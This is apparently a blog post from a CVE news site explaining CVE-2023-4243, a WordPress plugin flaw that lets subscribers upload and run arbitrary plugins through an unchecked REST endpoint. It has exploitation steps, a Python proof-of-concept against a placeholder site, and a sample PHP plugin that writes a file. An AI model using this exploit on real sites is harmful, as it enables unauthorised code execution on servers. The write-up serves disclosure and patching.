CVE CyberSecurity Database News

CVE-2023-4243 - Arbitrary File Upload Vulnerability in FULL – Customer WordPress Plugin Explained (with Exploit Details)

Poster -

> This long-read post breaks down CVE-2023-4243—a critical flaw found in the FULL – Customer WordPress plugin. We'll walk through what it is, show you code, link to original sources, and demonstrate how attackers can exploit this vulnerability.

1. What is CVE-2023-4243?

CVE-2023-4243 is the identifier given to a security vulnerability in the FULL – Customer WordPress plugin, affecting versions up to and including 2.2.3. This vulnerability lets users—even ones with low privileges like subscribers—upload and install _any_ plugin from outside the official WordPress repository. That means an attacker can upload a custom plugin, containing malicious code, and run it on your site.

2. Why is it Dangerous?

- Low Privilege required: Even a user with *subscriber* rights (not just admins) can trigger this bug.
- Remote Code Execution: If an attacker uploads a plugin with PHP code, they can run _any_ code they want on your server.

The plugin exposes a REST API endpoint at

/wp-json/customer/v1/install-plugin

The endpoint is supposed to be used by site admins to install plugins, but it fails to check if the user is *really* authorized to do this.

Here is a pseudocode representation of how it was implemented

// In the FULL - Customer plugin

register_rest_route('customer/v1', '/install-plugin', array(
    'methods'  => 'POST',
    'callback' => 'install_plugin_callback',
    'permission_callback' => null // <-- NO PROPER PERMISSION CHECK
));

Instead of making sure only admins can use this endpoint, it allows any authenticated user.

What Attackers Can Do

An attacker with a regular account can send a specially crafted HTTP POST request, with a multipart/form-data body containing a ZIP file. Inside that ZIP, they can put any PHP code—so long as it's wrapped up as a valid WordPress plugin.

The installed plugin then immediately becomes executable on your site.

Sign up as a regular *subscriber* on the target WordPress site.

2. Craft a malicious plugin—just a ZIP with a simple plugin.php file that contains code you want to run.
3. Send a POST request to /wp-json/customer/v1/install-plugin with your plugin ZIP as the file parameter.

Below is a simple proof-of-concept using Python and requests

import requests

# Replace these with the actual target site and your subscriber credentials
url = "https://victim.com/wp-json/customer/v1/install-plugin";
username = "subscriber_user"
password = "subscriber_pass"

# Malicious plugin zip as file
files = {'file': ('evil-plugin.zip', open('evil-plugin.zip', 'rb'))}

# Authenticate with WordPress (use cookies or Application Passwords if needed)
session = requests.Session()
# You might need to log in, get a token, or use Auth headers here depending on setup

response = session.post(url, files=files, auth=(username, password))

print("Response:", response.status_code, response.text)

evil-plugin.php

<?php
/*
Plugin Name: Evil Plugin
*/
file_put_contents(ABSPATH . 'pwned.txt', 'You have been hacked!');
?>

Zip this file as evil-plugin.zip, and use the code above to upload it.

6. How to Fix It

Update: The vendor was notified and a fix was released after version 2.2.3. Make sure you are using the *latest* version of FULL – Customer.

7. References & More Information

- NVD entry for CVE-2023-4243
- Wordfence advisory
- Plugin details at WordPress.org

8. Summary Table

| | Description |
|------|----------------------------------------------------|
| CVE | CVE-2023-4243 |
| Plugin | FULL – Customer |
| Affected versions | <= 2.2.3 |
| Auth required | Yes (subscriber and above) |
| Impact | Arbitrary plugin upload & code execution |
| Fix | Update to latest version |

9. Final Notes

CVE-2023-4243 shows how a simple permission oversight can put any WordPress site at risk—even if user registration is enabled for just subscribers. Always keep your plugins updated, check for unnecessary users, and audit your site's REST API routes.

Stay safe!

*This technical deep dive is an exclusive, clear walkthrough designed for everyone from beginners to experienced WordPress admins. Share this post if you found it helpful!*

Timeline

Published on: 08/09/2023 04:15:00 UTC
Last modified on: 08/14/2023 15:36:00 UTC